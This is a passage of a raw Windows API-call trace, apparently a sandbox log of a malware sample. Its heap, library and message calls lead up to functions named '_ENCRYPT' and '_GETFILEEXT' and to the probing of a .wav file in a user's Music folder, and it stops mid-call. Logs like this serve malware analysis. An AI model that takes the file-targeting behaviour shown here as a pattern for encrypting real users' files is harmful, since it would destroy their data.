[0187.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0187.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0187.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0187.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0187.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0187.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0187.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0187.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0187.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0187.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0187.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0187.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0187.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0187.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0187.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0187.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0187.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0187.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0187.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0187.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0187.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0187.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0187.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0187.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0187.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0187.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0187.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0187.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0187.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0187.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0187.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0187.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0187.639] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0187.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0187.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0187.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0187.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0187.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0187.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.641] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0187.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0187.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0187.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0187.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0187.641] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0187.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0187.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0187.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0187.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0187.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0187.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.642] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0187.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0187.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0187.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0187.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.643] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fe8 [0187.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9fe8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0187.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.644] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0187.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0187.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0187.644] CloseHandle (hObject=0x160) returned 1 [0187.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0187.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0187.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0187.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0187.645] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0187.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.645] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0187.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0187.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0187.646] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.646] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0187.646] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.646] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0187.646] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0187.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.646] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.646] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.646] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.646] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81cfc90, ftCreationTime.dwHighDateTime=0x1d5e1e5, ftLastAccessTime.dwLowDateTime=0xd71f9320, ftLastAccessTime.dwHighDateTime=0x1d5d87d, ftLastWriteTime.dwLowDateTime=0xd71f9320, ftLastWriteTime.dwHighDateTime=0x1d5d87d, nFileSizeHigh=0x0, nFileSizeLow=0x2675, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="OLqMC1.wav", cAlternateFileName="")) returned 0x90add8 [0187.646] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0187.647] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.647] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81cfc90, ftCreationTime.dwHighDateTime=0x1d5e1e5, ftLastAccessTime.dwLowDateTime=0xd71f9320, ftLastAccessTime.dwHighDateTime=0x1d5d87d, ftLastWriteTime.dwLowDateTime=0xd71f9320, ftLastWriteTime.dwHighDateTime=0x1d5d87d, nFileSizeHigh=0x0, nFileSizeLow=0x2675, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="OLqMC1.wav", cAlternateFileName="")) returned 0x90add8 [0187.647] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0187.647] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.647] CompareStringW 